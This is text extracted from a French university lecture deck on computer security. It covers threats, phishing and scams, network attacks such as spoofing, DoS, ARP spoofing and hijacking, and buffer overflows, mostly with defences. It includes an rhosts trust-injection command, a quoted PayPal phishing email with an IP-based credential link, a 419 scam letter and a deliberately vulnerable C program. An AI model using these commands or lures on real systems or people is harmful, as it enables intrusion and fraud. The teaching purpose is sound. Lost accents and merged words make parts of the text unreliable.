117790093-securite-informatique.pdf

7/25/2019 117790093-securite-informatique.pdf

1/139

1

ScuritInformatique

Patrick [email protected]

http://www.ducrot.org/securite.pdf

28/09/2012 - ENSICAEN - (c) dp 2

Plan du document

Gnralits 3

Les menaces 28

Vulnrabilits du rseau 63

Vulnrabilits applicatives 97Scurit des systmes 151

Les outils d'attaque/dfense 155

Chiffrement, tunnels et vpn 214

Firewall 233

Les honeypots 249

WiFi et scurit 255

Conseils et conclusion269


2/139

2

28/09/2012 - ENSICAEN - (c) dp 3

Gnralits

28/09/2012 - ENSICAEN - (c) dp 4

Qu'est ce qu'un systmed'information ?

Systme dSystme dinformationinformation :organisation des activits consistant

acqurir, stocker, transformer, diffuser, exploiter, grer... les informations

Un des moyens techniquespour faire fonctionner un systme dinformation est dutiliser un

Systme informatiqueSystme informatique


3/139

3

28/09/2012 - ENSICAEN - (c) dp 5

La scurit des systmesinformatiques Les systmes informatiques sont au cur

des systmes dinformation.

Ils sont devenus la cible de ceux quiconvoitent linformation.

Assurer la scurit de linformation impliquedassurer la scurit des systmesinformatiques.

28/09/2012 - ENSICAEN - (c) dp 6

La scurit des systmesinformatiques

Attaques rseauConfidentialit(coute)Intgrit(modificationpaquets)Disponibilit (saturation)

Accs illicites (intrusion)confidentialitIntgritDisponibilit

Rayonnementsconfidentialit

RESEAU

VirusIntgritDisponibilit

Erreurs de saisieConfidentialitIntgrit


4/139

4

28/09/2012 - ENSICAEN - (c) dp 7

Origine des attaques

28/09/2012 - ENSICAEN - (c) dp 8

Objectifs de la scuritinformatique

Quelques objectifs garantir:

intgrit confidentialit

Disponibilit

Authentification

Non rpudiation


5/139

5

28/09/2012 - ENSICAEN - (c) dp 9

Evolution des risques

Croissance de l'Internet

Croissance des attaques

Failles des technologies

Failles des configurations

Failles des politiques de scurit Changement de profil des pirates

28/09/2012 - ENSICAEN - (c) dp 10

Qui sont les pirates ?

Peut tre n'importe qui avec l'volution et la vulgarisation desconnaissances.

Beaucoup d'outils sont disponibles sur Internet.

Vocabulaire: script kiddies

hacktiviste

hackers white hats grey hats black hats cracker carder phreaker


6/139

6

28/09/2012 - ENSICAEN - (c) dp 11

Phnomnes techniques

Explosion de la technologie des transferts dedonnes (comme par exemple le cloudcomputing )

Grande complexit des architectures desystmes.

Ouverture (pas toujours matrise) desrseaux de communication

28/09/2012 - ENSICAEN - (c) dp 12

Phnomnes organisationnels

Besoin de plus en plus d'informations

Grande diversit dans la nature des

informations: donnes financires donnes techniques

donnes mdicales

Ces donnes constituent les biens del'entreprise et peuvent tre trs convoites.


7/139

7

28/09/2012 - ENSICAEN - (c) dp 13

Objectifs des attaques Dsinformer (exemple: lagence Reuters annonce la mort du

prince Saoud Al-Faycal opr des intestins le 15 aot 2012)

Empcher l'accs une ressource

Prendre le contrle d'une ressource

Rcuprer de l'information prsente sur le systme

Utiliser le systme compromis pour rebondir

Constituer un rseau de botnet (ou rseau de machineszombies)

Les botnets

La notion de botnet date des premiers rseaux irc (dbut des annes 1990).

Rseau de machines contrles par un bot herder ou botmaster .

Un botnet peut tre contrl par

- Serveurs irc

- Serveurs web

- Requtes DNS

- Messageries instantanes

- Peer to Peer

- Skype

-

28/09/2012 - ENSICAEN - (c) dp 14


8/139

8

Les botnets Estimation: une machine sur quatre fait partie dun botnet, soit environ 154 millions de machines (Vinton

Cerf Davos en janvier 2007).

Un botnet peut tre utilispour:

Envoyer du spam

Vol dinformations sensibles (avec un keylogger par exemple).

Installer des spywares.

Paralyser un rseau en dni de services

Installer un site web malicieux (phishing)

Truquer les statistiques de sites webs (sondage en lignes authentifis par des adresses IP,rmunrationsur des clics de bannires, )

Quelquesexemples: Jeanson James Ancheta, condamn en 2006 57 mois de prison ferme et trois ans de libertssurveilles, la tte dun botnet estim 400 000 machines.

Pirate connu sous le pseudo de 0x80 . Lire larticl e:

http://www.washingtonpost.com/wp-dyn/content/article/2006/02/14/AR2006021401342.html

28/09/2012 - ENSICAEN - (c) dp 15

Botnet irc

28/09/2012 - ENSICAEN - (c) dp 16


9/139

9

Botnet p2p

28/09/2012 - ENSICAEN - (c) dp 17

28/09/2012 - ENSICAEN - (c) dp 18

Motivations des attaques

Vol dinformations

Cupidit

Modifications dinformations

Vengeance/rancune

Politique/religion

Dfis intellectuelssource: http://www.zone-h.fr


10/139

10

28/09/2012 - ENSICAEN - (c) dp 19

Cible des pirates

Les tats

Serveurs militaires

Banques

Universits

Tout le monde

28/09/2012 - ENSICAEN - (c) dp 20

La scurit : une ncessit

Informaticiens

Stratgie de scurit

Lgislation

Contrats

Utilisateurs Logiciels

Matriel

Rseaux


11/139

11

28/09/2012 - ENSICAEN - (c) dp 21

Niveaux de scurisation

Sensibilisation des utilisateurs aux problmes descurit.

Scurisation des donnes, des applications, dessystmes d'exploitation.

Scurisation des tlcommunications.

Scurisation physiques du matriel et des accs.

28/09/2012 - ENSICAEN - (c) dp 22

Politique de scurit

Compromis fonctionnalit - scurit.

Identifier les risques et leurs consquences.

Elaborer des rgles et des procdures mettre enuvre pourles risques identifis.

Surveillance et veille technologique sur les vulnrabilitsdcouvertes.

Actions entreprendre et personnes contacter en cas dedtection d'un problme.


12/139

12

28/09/2012 - ENSICAEN - (c) dp 23

Mise en place d'une politique descurit

Mise enuvre

Audit

Tests d'intrusion

Dtection d'incidents

Ractions Restauration

28/09/2012 - ENSICAEN - (c) dp 24

Quelques mthodes

EBIOS (Expressions des Besoins et Identification desObjectifs de Scurit)http://www.ssi.gouv.fr/fr/confiance/ebios.html

MEHARI (MEthode Harmonise d'Analyse deRisques)http://www.clusif.asso.fr/fr/production/mehari


13/139

13

La norme ISO 27000

ISO 2000 Vocabulaire et dfinitions

ISO 27001 (octobre 2005) spcifie un Systme de Gestion de laScurit des Systmes dInformation (Plan/Do/Check/Act))

ISO 27002 (remplaant la norme 17799 depuis le 1erjuillet2007) est un code de bonnes pratiques

Plus dinformations: http://www.iso27001security.com/

28/09/2012 - ENSICAEN - (c) dp 25

Planifier

Mettre enuvre Amliorer

Vrifier

La norme ISO 27000

28/09/2012 - ENSICAEN - (c) dp 26


14/139

14

Application PSSI

28/09/2012 - ENSICAEN - (c) dp 27

28/09/2012 - ENSICAEN - (c) dp 28

Les menaces


15/139

15

28/09/2012 - ENSICAEN - (c) dp 29

Techniques d'attaques

Social Engineering

MICE (Money, Ideology, Compromise, Ego)

Dumpster diving

Shoulder surfing

Sniffing

Scannings etc.

28/09/2012 - ENSICAEN - (c) dp 30

Exemple de socialengineering

Kevin Mitnick 3 livres, 1 film

(Cybertraque).

Piratage des rseauxtlphoniques.

Attaque des machinesde Tsumotu Shimomuraau San DiegoSupercomputing Center.

5 ans de prison et sousinterdiction dutiliser desordinateurs.


16/139

16

28/09/2012 - ENSICAEN - (c) dp 31

Dissimulation d'informations

L'information peut tre dissimule dans unbut de protection (mot de passe, ) ou dansdes buts moins lgaux.

Diffrentes mthodes pour s'changer del'information de manire sre: chiffrement (symtrique,asymtrique)

stganographie

Tout n'est pas autoris par la loi.

28/09/2012 - ENSICAEN - (c) dp 32

Stganographie

Procd ancien de dissimulation d'informations sensiblesparmi d'autres informations moins importantes.

Exemple: lettre de George Sand Alfred de Musset:


17/139

17

28/09/2012 - ENSICAEN - (c) dp 33

Stganographie

Fichiers graphiques ou sons assez adaptscomme support.

Cas particulier du watermarking. Exemples de logiciels:

Steganos Security Suite http://www.steganography.com

outguess http://www.outguess.org MP3Stego

http://www.petitcolas.net/fabien/steganography/mp3stego/

28/09/2012 - ENSICAEN - (c) dp 34

Menaces lies aux rseaux

Menaces actives Panne, mauvaise utilisation, pertes d'informations Contamination (virus, vers, spyware) Spam, phishing

Chevaux de troie (backdoors) Dnis de services Intrusions Bombes logiques

Menaces passives coute des lignes Analyse de trafic Source: rapport PandaLabs 2012


18/139

18

28/09/2012 - ENSICAEN - (c) dp 35

Virus

Portion de code inoffensive ou destructrice capable de sereproduire et de se propager.

Diffrents types de virus: Virus boot Virus dissimul dans les excutables Macro virus

Diffrentes contaminations possibles:

change de disquettes Pices jointes au courrier lectronique Excutables rcuprs sur Internet etc.

28/09/2012 - ENSICAEN - (c) dp 36

Vers

Proches des virus mais capables de se propager sur d'autresordinateurs travers le rseau.

Un moyen courant de propagation: le carnet d'adresses

d'outlook (ex: "I Love you": dni de service sur les serveursweb).

Quelques exemples: Code Red (utilisation d'une faille des serveurs IIS et

dfiguration des sites)

Blaster (utilisation d'une faille du protocole windows DCMRPC)


19/139

19

28/09/2012 - ENSICAEN - (c) dp 37

Propagation du ver Sapphire:http://www.caida.org/research/security/sapphire

25 janvier 2003, 05:29 0 victime

25 janvier 2003, 06:00 74 855 victimes

Propagation du ver WaledacDescription du ver: http://www.f-secure.com/v-descs/email-worm_w32_waledac_a.shtml

28/09/2012 - ENSICAEN - (c) dp 38

http://windows7news.com/2010/02/25/operation-b49-waledac-botnet-take-down/


20/139

20

28/09/2012 - ENSICAEN - (c) dp 39

Chevaux de troie Trs rpandu (exemples: attaque du ministre de lconomie et

des finances rendu public en dcembre 2010, attaque contreAREVA rendu public le 29 septembre 2011, infections par desvulnrabilits dInternet Explorer en septembre 2012, )

Quelques exemples anciens de chevaux de Troie: Back Orifice

Permet de l administration distance.

Sockets23 (Socket de Troie)Signalait la prsence des ordinateurs infects sur desserveurs de discussion en direct de type irc.

28/09/2012 - ENSICAEN - (c) dp 40

Les spywares

Dfinition du spyware (http://en.wikipedia.org/wiki/Spyware):

Un spyware ("espiogiciel") est un logiciel qui collecte des informations d'unemachine et les envoie l'insu de l'utilisateur sans son consentement.

Concept invent par Microsoft en 1995.

Un spyware se dcline aujourd'hui en "adware" (logiciel d'affichage depublicit) et en "malware" ("pourriciel", logiciels hostiles)


21/139

21

28/09/2012 - ENSICAEN - (c) dp 41

Techniques d'infection desspywares Les logiciels lis (bundles): installation du spyware en mme temps qu'un

logiciel lgitime (KaZaA: Cydoor, codec DivX, )

La navigation sur Internet exploitation de failles (essentiellement mais pas uniquement avec Internet

Explorer) Installation volontaire (par acceptation) d'un logiciel, activeX, plug-in

La messagerie incitant par SPAM visiter des sites douteux.

Une exemple particulier: 2 septembre 2008 travers le webmail de la Poste

http://www.01net.com/editorial/389835/laposte.net-a-diffuse-involontairement-une-publicite-piegee/

28/09/2012 - ENSICAEN - (c) dp 42

Dtection de spyware

Comportement anormal de la machine: Fentres "popup" intempestive. Page d'accueil du navigateur modifie. Apparitions d'icnes sur le bureau. Connexions Internet intempestives. Trafic rseau anormal.

Dsactivation des outils de scurit locaux. Les outils de scurit locaux:

DLL modifie (dtectable par un antivirus). Firewall personnel Outils anti rootkits

Les outils de scurit rseau: Connexions rcurrentes et/ou nocturnes. Tlchargements suspects. Connexions vers des sites rputs pour tre lis au spyware. Connexions vers des sites non rfrencs dans un dns. Connexions vers des sites .ru .cc .tw .cn


22/139

22

28/09/2012 - ENSICAEN - (c) dp 43

Les "anti spywares" En 2000, Gibson Research dveloppe le 1er progamme antispyware: OptOut

(http://grc.com/optout.htm).

Beaucoup de programmes commerciaux pour liminer les spywares quiproposent tous un dtecteur gratuit; quelques exemples:

XoftSpy : http://www.paretologic.com/xoftspy/lp/14/ NoAdware: http://www.noadware.net/new3/?hop=comparets Anonymizer's Anti-Spyware

http://www.zonelabs.com Et bien d'autres

Quelques solutions domaine public: Ad-Aware Standard Edition http://www.lavasoft.de/ Spybot http://www.spybot.info/fr Logiciels Microsoft http://www.microsoft.com/downloads

28/09/2012 - ENSICAEN - (c) dp 44

La protection contre les spywares

Pas de protection universelle puisqu'en perptuellesvolutions.

Quelques rgles respecter nanmoins: Sensibiliser les utilisateurs sur les risques lis l'installation

de logiciels non directement utiles (barres dans lesnavigateurs, codec DivX, )

Ne pas consulter des sites douteux.

Inciter les utilisateurs signaler l'infection de leur machinepar un spyware.

Utiliser des outils de protections spcifiques


23/139

23

28/09/2012 - ENSICAEN - (c) dp 45

SPAM Dfinition de la CNIL: Envoi massif et parfois rpt de courriers

lectroniques non sollicits des personnes avec lesquelleslexpditeur na jamais eu de contact au pralable, et dont il a captladresse lectronique de faon irrgulire.(pourriel en franais).

SPAM=SpicedPorkAndMeat, popularis par unsketch des MontyPython(http://www.dailymotion.com/swf/x3a5yl)

Un message va tre dpos dans une liste de serveurs de courrier; lesserveurs abuss vont envoyer une copie chaque destinataire.

Courrier bas sur une liste dadresses collectes de manire dloyaleet illicite.

Messages peu coteux lenvoi mais coteux pour le destinataire.

28/09/2012 - ENSICAEN - (c) dp 46

Le spam en quelques chiffres 90 % des courriers changs sont des spams

6500 nouvelles pages webs associes au spam dcouvertes chaque jour (1 page toutes les13 secondes).

99 % du spam est relay par des machines de particuliers

1er semestre 2009: relais de spams par pays et par continent:

Source : Rapport Sophos 2009 sur les menaces de la scurit


24/139

24

28/09/2012 - ENSICAEN - (c) dp 47

Protections contre le spamct utilisateurs Ne rien acheter par lintermdiaire de publicit faite par un spam (des tudes

indiquent que 29% des utilisateurs le font).

Ne jamais rpondre un spam.

Ne pas mettre dadresses lectroniques sur les sites webs mais les encoder parun script ou dans une image (exemple: http://www.caspam.org); voir transparentsuivant.

Etre prudent dans le remplissage de formulaires demandant des adresseslectroniques; on peut parfois utiliser des adresses jetables . Exemple:http://www.jetable.org(adresse valable dune heure un mois, certains sites

peuvent ne pas accepter ce genre dadresses).

Protection au niveau du client de messagerie (gestion des "indsirables") .

Exemple de codage dadresse

28/09/2012 - ENSICAEN - (c) dp 48

Laisser un message ici

Laisser un message//


25/139

25

Adresse jetable

28/09/2012 - ENSICAEN - (c) dp 49

Protection contre le spamsur les serveurs de messageries

Protection dlicate: la frontire entre un courriel et un pourriel nest pas toujoursfranche et il ne faut pas rejeter des courriers rels.

Un serveur de courrier doit tre bien configur (en particulier, pas dOpenRelay ).

Gestion de listes blanches.

Gestion de listes noires: Manuellement Par utilisation de bases de donnes de relais ouverts (Exemple:

http://www.spamhaus.org).

Gestion de listes grises.

Des outils de filtrage en aval: spam assassin pure message (sophos)

28/09/2012 - ENSICAEN - (c) dp 50


26/139

26

28/09/2012 - ENSICAEN - (c) dp 51

Effet du grey listing (13 mars2006)

28/09/2012 - ENSICAEN - (c) dp 52

Phishing

Contraction de PHreaking et fISHING (Hameonnage).

Technique d'ingnierie sociale utilise par des arnaqueurs (scammers)

Technique ancienne mais utilise massivement depuis 2003.

Par le biais de courrier lectronique, messages instantans, site webs,etc., on tente de duper l'utilisateur en le faisant cliquer sur un lien.

L'objectif est d'obtenir des adresses de cartes de crdit, des mots depasse, etc.

Les adresses sont collectes au hasard, mais statistiquement unutilisateur peut avoir l'impression de recevoir un courrier d'un site qui luiest familier (banque, ).


27/139

27

28/09/2012 - ENSICAEN - (c) dp 53

Exemples de cible dephishing

Visa

eBay

Citibank

PayPal

Banques

Aujourdhui: tout le monde

28/09/2012 - ENSICAEN - (c) dp 54

Exemple phishingDear valued PayPal member:Due to concerns, for the safety and integrity of the paypal

account we have issued this warning message.

It has come to our attention that your PayPal account information needs to beupdated as part of our continuing commitment to protect your account and toreduce the instance of fraud on our website. If you could please take 5-10 minutesout of your online experience and update your personal records you will not run intoany future problems with the online service.

However, failure to update your records will result in account suspension.Please update your records on or beforeOct 04, 2005.

Once you have updated your account records your paypal accountservice will not be interrupted and will continue as normal.

To update your PayPal records click on the following link:http://www.paypal.com/cgi-bin/webscr?cmd=_login-run

Thank You.PayPal UPDATE TEAM

http://209.133.49.211/icons/cgi-bin/login.html


28/139

28

28/09/2012 - ENSICAEN - (c) dp 55

Faux site paypal

Exemple phishing eBay

28/09/2012 - ENSICAEN - (c) dp 56


29/139

29

Faux site eBay

28/09/2012 - ENSICAEN - (c) dp 57

Exemple phishing Caisse-Epargne (27 novembre 2009)

28/09/2012 - ENSICAEN - (c) dp 58


30/139

30

28/09/2012 - ENSICAEN - (c) dp 59

Protection contre le phishing Vrifier la pertinence des messages.

Ne pas cliquer sur un lien (mais taper l'adresse dans lenavigateur).

Etre prudent avec les formulaires demandant desinformations confidentielles.

Lors de la saisie d'informations confidentielles, vrifier quel'information est chiffre et le certificat valide.

Certains sites commerciaux (ebay, paypal, ) rappellent lenom d'utilisateur dans les courriers envoys. Un courrier

commenant par quelque chose ressemblant "Cherutilisateur d'ebay" peut tre par consquent suspect.

28/09/2012 - ENSICAEN - (c) dp 60

Le "scam"

Pratique frauduleuse d'origine africaine("ruse") pour extorquer des fonds desinternautes.

Rception d'un courrier lectronique dudescendant d'un riche africain dcd dont ilfaut transfrer les fonds.

Connue aussi sous le nom de 419 enrfrence l'article du code pnal nigrianrprimant ce type d'arnaque.


31/139

31

28/09/2012 - ENSICAEN - (c) dp 61

Exemple de "scam"Objet: ASSISTANCEGEORGES TRAORE ABIDJAN,CTE D'IVOIRE. AFRIQUE DE L'OUEST.Bonjour,Je vous prie de bien vouloir excuser cette intrusion qui peut paratre surprenante premire vue d'autant qu'il

n'existeaucune relation entre nous. Je voudrais avec votre accord vous prsenter ma situation et vous proposer une

affaire quipourrait vous intresser. Je me nomme Georges TRAORE, j'ai 22 ans et le seul fils de mon Pre Honorable

RICHARDANDERSON TRAORE qui tait un homme trs riche, ngociant de Caf/Cacao bas Abidjan la CapitaleEconomique de la Cte d'Ivoire, empoisonn rcemment par ses associs. Aprs la mort de ma mre le 21

Octobre 2000,mon pre m'as pris spcialement avec lui. Le 24 Dcembre 2003 est survenu le dcs de mon pre dans une

cliniqueprive (LAMADONE) Abidjan. Avant sa mort, secrtement, il m'a dit qu'il a dpos une somme d'un montant

de($8,500,000) Huit Millions Cinq Cent Mille Dollars Amricains dans une valise dans une Compagnie de ScuritFinancire en mon nom comme hritier. En outre, il m'a dit que c'est par rapport cette richesse qu'il a t

empoisonnpar ses associs. Il me recommande aussi de chercher un associ tranger qui pourrait honntement me faire

bnficierde son assistance pour sauver ma vie et assurer mon existence. - Changement de bnficaire;

- Servir de gardien ;- - Fournir un compte pour le transfert de fonds ;- - M'aider le rejoindre dans son pays ;- - Investir dans un domaine profitable.D'ailleurs, je vous donnerai 25 % et 5% serviront aux dpenses ventuelles qui seront effectues..

28/09/2012 - ENSICAEN - (c) dp 62

Consquences des virus, vers,spywares, spam

Perte de donnes

Perte de temps de travail

Perte dimage de marque Perte de fonctionnalits (systme ou

email bloqus)

Perte de confidentialit


32/139

32

28/09/2012 - ENSICAEN - (c) dp 63

Vulnrabilits des

rseaux

28/09/2012 - ENSICAEN - (c) dp 64

Vulnrabilit des rseaux

Les rseaux peuvent tre vulnrables:

par une mauvaise implmentation despiles udp/ip et tcp/ip.

par des faiblesses des protocoles


33/139

33

28/09/2012 - ENSICAEN - (c) dp 65

Rappel : Entte IP

32 bits

Version IHL Type Service Longueur Totale

Identification Flags Dcalage Fragment

TTL Protocole Contrle entte

Adresse Source

Adresse Destination

Options Remplissage

28/09/2012 - ENSICAEN - (c) dp 66

Rappel: Entte UDP

Port source Port destination

Longu eu r UDP Tot al de cont rle U DP

32 bits


34/139

34

28/09/2012 - ENSICAEN - (c) dp 67

Rappel: Entte TCP

Port source Port destination

Numro de squence

Numro d'acquittement

Long

entte

TCP

U A P R S F

R C S S Y I

G K H T N NTaillede la fentre

Tot al de contrle Point eur d'urgence

Options (0, 1 ou plusieurs mots de 32 bits

Donnes (optionnelles)

32 bits

28/09/2012 - ENSICAEN - (c) dp 68

Rappel: tablissement d'uneconnexion TCP

Connexion en 3 temps (Three WayHandshake).


35/139

35

28/09/2012 - ENSICAEN - (c) dp 69

Sniffer

Outil de base indispensable.

Permet de visualiser les trames sur unsegment de rseau.

Ncessite des droits administrateurs.

Attention au problme juridique

Utilise des sockets en mode promiscuous socket (AF_INET,SOCK_RAW,IPPROTO_RAW)

28/09/2012 - ENSICAEN - (c) dp 70

Sniffer

Beaucoup de logiciels sniffers existants.

Liste sur

http://packetstormsecurity.org/sniffers Le sniffer de base pour unix: tcpdump Disponible sur http://www.tcpdump.org.

Grammaire trs volue.

Affiche les enttes de paquets rpondant aucritre spcifi.


36/139

36

28/09/2012 - ENSICAEN - (c) dp 71

Sniffer multiplateformes

wireshark (http://www.wireshark.org)

Interprtation deplusieurs centaines

de protocolesapplicatifs

28/09/2012 - ENSICAEN - (c) dp 72

sniffer plus "spcialis": Cain &Abel


37/139

37

28/09/2012 - ENSICAEN - (c) dp 73

IP Spoofing

Mthode d'attaque qui parodie l'adresse IP d'unautre ordinateur (usurpation).

Permet de brouiller les pistes ou d'obtenir unaccs des systmes sur lesquelsl'authentification est fonde sur l'adresse IP

(rlogin, rsh sur les machines numro desquence TCP prvisible).

28/09/2012 - ENSICAEN - (c) dp 74

Usurpation d'identit

Exemple d'utilisation: attaque d'un remoteshell: echo "+ +" >>/.rhosts


38/139

38

28/09/2012 - ENSICAEN - (c) dp 75

Dni de service (DOS)

Denial Of Service Attaque destine empcher l utilisation d une

machine ou d un service. Type d'attaque utilise par frustration, par rancune,

par ncessit, Souvent plus facile de paralyser un rseau que d'en

obtenir un accs.

Ce type d attaque peut engendrer des pertes trsimportantes pour une entreprise.

Attaque relativement simple mettre enuvre(outils faciles a trouver).

28/09/2012 - ENSICAEN - (c) dp 76

Diffrents types de DOS

DOS local (puisement des ressources) Saturation de l'espace disque rpertoires rcursifs

boucle infinie de fork () DOS par le rseau (consommation de bande passante)

SYN flood Rassemblage de fragments (Ex: teardrop, ping of the

death) Flags TCP illgaux DOS distribu (DDOS)


39/139

39

28/09/2012 - ENSICAEN - (c) dp 77

DOS par SYN flood Attaque par inondation de SYN avec une

adresse source usurpe (spoofe) etinaccessible.

La machine cible doit grer une liste deconnexions dans l tat SYN_RECV .

Une attaque est visible si la commandenetstat an indique un grand nombre deconnexions dans l'tat SYN_RECV.

28/09/2012 - ENSICAEN - (c) dp 78

Parades au SYN Flood

Allongement de la longueur de la filed'attente.

Rduction de la dure de temporisationd'tablissement d'une connexion.

OS modernes sont protgs (SYN Cookie,SYN cache, ).


40/139

40

Exemples danciennesattaques sur la pile IP Malversations sur la fragmentation IP

Scinder une demande de connexion sur 2fragments

Faire chevaucher 2 fragments IP (teardrop)

Adresses IP source et destinations identiques (land)

Ping de la mort (Ping Death,

http://www.insecure.org/sploits/ping-o-death.html) UDP Flood

28/09/2012 - ENSICAEN - (c) dp 79

28/09/2012 - ENSICAEN - (c) dp 80

DDOS

Distributed Denial Of Service.

Type d attaque trs en vogue.

L objectif est d crouler une machine et/ou saturer la bandepassante de la victime.

Ncessite un grand nombre de machines corrompues.

Attaque popularise le 14 fvrier 2000 sur quelques sites .comrenomms (ebay, cnn, amazon, microsoft, ). Le coupable,Michael Calce alias Mafiaboy , 15 ans, est arrt au Canadale 15 avril et condamn 8 mois dans un centre de dtentionpour jeunes. Il a caus des pertes estimes 1,7 milliards dedollar.


41/139

41

28/09/2012 - ENSICAEN - (c) dp 81

Scnario d un DDOS

28/09/2012 - ENSICAEN - (c) dp 82

Quelques exemples de DDOS Tribe Flood Network (TFN) Trinoo TFN2K

Trinity (utilise les serveurs irc) etc. Parades:

tre attentif aux ports ouverts


42/139

42

Utilisation des DDos

Un botnet de 1000 machines peut saturer la bandepassante dune grande entreprise (1000 * 128Kb/s =128 Mb/s).

Une entreprise peut acheter les services dun botherders pour attaquer un concurrent.

Ddos extortion : des pirates peuvent menacer dessites de commerce en ligne (Exemple: la socitCanbet en Angleterre).

28/09/2012 - ENSICAEN - (c) dp 83

28/09/2012 - ENSICAEN - (c) dp 84

Exemples de ddos Serveurs DNS de la compagnie Akamai attaqu le 16 juin 2004 (sites Microsoft, Google,

Yahoo, fedEx, Xerox, Apple injoignables pendant une courte priode).

Mastercard, PayPal, EveryDNS, Swiss Bank PostFinances en dcembre 2010 par lesAnonymous

NBS victime dune attaque DDOS dans la nuit du 10 au 11 octobre 2011 http://www.loichelias.com/nbs-attaque-ddos


43/139

43

Exemples DDOS Bande passante du rseau informatique du snat les 25 et 26 dcembre 2011

avant ladoption de la loi rprimant la contestation des gnocides *

Et tant dautres.

*Source: rapport No 681 du snat par Jean-Marie Bockel

28/09/2012 - ENSICAEN - (c) dp 85

28/09/2012 - ENSICAEN - (c) dp 86

arp spoofing

Pollution des caches arp avec de fausses associations adressemac/adresse IP.

Permet des attaques de type "man in the middle", DOS,transgression des rgles d'un firewall par spoofing.

arp-reply

192.168.16.10

00:50:04:47:5F:5F

192.168.16.10


44/139

44

28/09/2012 - ENSICAEN - (c) dp 87

arp spoofing Exemple d'outil d'arp spoofing:

arp-sk (linux) Cain & Abel (Windows)

28/09/2012 - ENSICAEN - (c) dp 88

Parades contre le arpspoofing

Utiliser des associations statiques (peusouple)

Surveiller les changements d'association: arpwatch (unix)http://www.securityfocus.com/data/tools/arpwatch.tar.Z

WinARP Watch (Windows)http://www.securityfocus.com/data/tools/warpwatch.zip


45/139

45

28/09/2012 - ENSICAEN - (c) dp 89

tcp hijacking

28/09/2012 - ENSICAEN - (c) dp 90

tcp hijacking

Numros de squence TCP pendant leschanges: Ut1 Seq x PSH/ACK y (10) Ut2

Ut1 Seq y PSH/ACK x+10 (20) Ut2

Ut1 Seq x+10 PSH/ACK y+20 (30) Ut2

Ut1 Seq y+20 PSH/ACK x+40 (10) Ut2

Pirate Seq x+40 PSH/ACK y+20 (30) Ut2

Ut1 Seq y+30 PSH/ACK x+70 (20) Ut2

Exemple d'outil de tcp hijacking: hunt http://www.spenneberg.org/TCP-Hijacking//


46/139

46

28/09/2012 - ENSICAEN - (c) dp 91

Smurf Envoie d'une trame ICMP "echo

request" sur une adresse de diffusion.

Exemple: ping 193.49.200.255

Mthode utilise pour dterminer lesmachines actives sur une plage IPdonne.

28/09/2012 - ENSICAEN - (c) dp 92

Attaque en Smurf Objectif: crouler une machine

3 parties: l'attaquant, l'intermdiaire, la victimeTrame ICMP sur adresse de diffusion du site relai

Adresse source: IP victime

Echo Request sur la victime


47/139

47

28/09/2012 - ENSICAEN - (c) dp 93

Parades au smurf

Interdire la rponse aux trames ICMPsur les adresses de diffusion: Au niveau routeur

Au niveau machine

28/09/2012 - ENSICAEN - (c) dp 94

DNS cache poisoning

Reroutage d'un site sur un site pirate

cache poisoning


48/139

48

28/09/2012 - ENSICAEN - (c) dp 95

Exemple: BIND

Vulnrabilit dcouverte en juillet 2007 touchant denombreuses versions de BIND(CVE-2007-2926 , BID-25037).

Description du CERTA:

"Une vulnrabilit a t identifie dans BIND. La failleconcerne le gnrateur d'identifiants de requtes,vulnrable une cryptanalyse permettant une chanceleve de deviner le prochain identifiant pour la moitides requtes. Ceci peut tre exploit par une personnemalintentionne pour effectuer du cache poisoning etdonc contourner la politique de scurit. "

Exemple faille DNS cachepoisoning

28/09/2012 - ENSICAEN - (c) dp 96


49/139

49

28/09/2012 - ENSICAEN - (c) dp 97

Vulnrabilits

applicatives

28/09/2012 - ENSICAEN - (c) dp 98

Vulnrabilits applicatives

Beaucoup d'applications sont vulnrables dues dela mauvaise programmation (par manque de temps,de motivation, ) ou volontairement (amnagementd'un point d'entre, ).

Toutes les applications ont besoin de scurit:services rseaux (daemons), les applicationstlcharges (applet java, ), les applications web(scripts cgi, ), les applications utilises parl'administrateur ou disposant d'un bit setuid/setgid,visualisateur de donnes distantes,


50/139

50

28/09/2012 - ENSICAEN - (c) dp 99

Vulnrabilits les pluscourantes Les vulnrabilits peuvent tre due:

"backdoors" laisses volontairement ouinvolontairement sur un service par leprogrammeur (Ex: rlogin sous AIX V3)

Erreurs de programmation Dbordements de tampons (buffer overflow)

Chanes de format Entres utilisateurs mal valides Les problmes de concurrence etc.

28/09/2012 - ENSICAEN - (c) dp 100

Buffer Overflow

Appele aussi "buffer overruns"; c'estune vulnrabilit extrmement tendue

(environ 2/3 des vulnrabilits).

criture de donnes en dehors de lazone alloue (pile ou tas).


51/139

51

28/09/2012 - ENSICAEN - (c) dp 101

Exemple code erronint main (int argc, char **argv){

char buf [8] ;strcpy (buf,argv [1]) ;

}fichier: demo.c

Excution:[dp@ns bufferoverflow]$ ./demo aaaaaaaaaaaaaaaaaaaaaaaaaaSegmentation fault

Sous debugger:

[dp@ns bufferoverflow]$ gdb demo(gdb) run aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaStarting program: /users/dp/bufferoverflow/demo

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaProgram received signal SIGSEGV, Segmentation fault.0x61616161 in ?? ()

28/09/2012 - ENSICAEN - (c) dp 102

Buffer Overflow

Si le buffer est une variable C locale, on pourraessayer de forcer la fonction excuter du codepirate ("stack smashing attack").

Beaucoup d'applications crites en langage C sontvulnrables car la simplicit et l'efficacit de celangage ont prvalu sur les contrles d'intgritlaisss la responsabilit du programmeur. Mais leproblme existe galement dans d'autres langagesde programmation.


52/139

52

28/09/2012 - ENSICAEN - (c) dp 103

Gestion de pile sous Unix

texttext

data initializeddata initialized

linker header &magic number

symbol table

heap

stack

command line arguments

and shell environment

Process in memory

Storage file

bss

28/09/2012 - ENSICAEN - (c) dp 104

Gestion de pile sous Linuxx86

gcc S stack.c

void function (int a,int b,int c)

{char buffer1 [5] ;

char buffer2 [10] ;

}

void main ()

{

function (1,2,3) ;

}


53/139

53

28/09/2012 - ENSICAEN - (c) dp 105

Gestion de pile sous Linuxx86.text

.align 4

.globl function

.type function,@function

function:

pushl %ebp

movl %esp,%ebp

subl $20,%esp

.L1:

leave

ret

.Lfe1:

.size function,.Lfe1-function

.align 4

.globl main

.type main,@function

main:

pushl %ebp

movl %esp,%ebp

pushl $3

pushl $2

pushl $1

call function

addl $12,%esp

.L2:

leave

ret

28/09/2012 - ENSICAEN - (c) dp 106

Gestion de pile sous Linuxx86

bss

heap

buffer2

buffer1

sfp

ret

a

b

c

user stack


54/139

54

28/09/2012 - ENSICAEN - (c) dp 107

Code Shell

